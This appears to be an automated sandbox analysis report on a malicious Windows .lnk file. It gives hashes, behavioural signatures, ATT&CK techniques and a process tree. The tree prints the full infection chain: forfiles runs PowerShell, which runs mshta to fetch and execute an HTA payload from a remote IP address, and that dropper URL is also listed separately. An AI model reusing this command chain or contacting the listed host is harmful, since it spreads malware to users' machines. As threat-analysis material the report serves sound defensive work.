Analysis

  • max time kernel
    41s
  • max time network
    48s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-07-2024 10:40

General

  • Target

    config.lnk.mal.lnk

  • Size

    1KB

  • MD5

    c6d3234e6d234ac35340b68402d65f7d

  • SHA1

    b6af26d59817c43729d48c46b9a4feee284f94eb

  • SHA256

    85b317bb4463a93ecc4d25af872401984d61e9ddcee4c275ea1f1d9875b5fa61

  • SHA512

    78794b7a77cd027b8dce320b6d1aaf918600a2d5c350ee676c705700a739fe7e55104ba29475ef6555adce4fec2ba0f13b0c9ca10d9730b7d8cfa44632d460b4

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://149.51.230.198:5566/config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\config.lnk.mal.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2788
    • C:\Windows\System32\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta http://149.51.230.198:5566/config"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        . mshta http://149.51.230.198:5566/config
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" http://149.51.230.198:5566/config
          4⤵
          • Blocklisted process makes network request
          PID:552

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r4t5jcpn.pjg.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2876-0-0x00007FF8B17D3000-0x00007FF8B17D5000-memory.dmp
    Filesize

    8KB

  • memory/2876-1-0x000002508EFB0000-0x000002508EFD2000-memory.dmp
    Filesize

    136KB

  • memory/2876-11-0x00007FF8B17D0000-0x00007FF8B2291000-memory.dmp
    Filesize

    10.8MB

  • memory/2876-12-0x00007FF8B17D0000-0x00007FF8B2291000-memory.dmp
    Filesize

    10.8MB

  • memory/2876-15-0x00007FF8B17D0000-0x00007FF8B2291000-memory.dmp
    Filesize

    10.8MB